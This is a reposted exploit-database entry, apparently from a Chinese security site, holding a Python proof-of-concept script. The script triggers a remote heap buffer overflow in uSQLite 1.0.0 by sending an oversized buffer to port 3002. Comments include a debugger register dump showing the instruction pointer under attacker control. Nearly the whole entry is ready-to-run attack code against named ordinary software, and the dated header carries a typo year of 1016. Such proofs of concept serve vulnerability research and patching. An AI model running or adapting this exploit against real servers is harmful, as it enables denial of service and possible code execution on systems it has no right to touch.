uSQLite 1.0.0 - Denial Of Service
|
来源:vfocus.net 作者:Baris 发布时间:2016-10-28
|
|
#!/usr/bin/python # Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC # Date: 27/10/1016 # Exploit Author: Peter Baris # Software Link: https://sourceforge.net/projects/usqlite/?source=directory # Version: 1.0.0 # Tested on: windows 7 and XP SP3 # Longer strings will cause heap based overflow # usage: python usqlite.py <host address> # Output in the debugger # EAX 0000038C # ECX 00B0DA10 # EDX 0000038C # EBX 41414141 # ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC # EBP 41414141 # ESI 41414141 # EDI 41414141 # EIP 42424242 <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR. ############################################################################################################################################### import socket import sys if len(sys.argv)<=1: print("Usage: python usqlite.py hostname") sys.exit() hostname=sys.argv[1] port = 3002 buffer = "A"*259+"B"*4+"C"*360 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((hostname,port)) sock.send(buffer +'\r\n') sock.recv(1024) sock.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|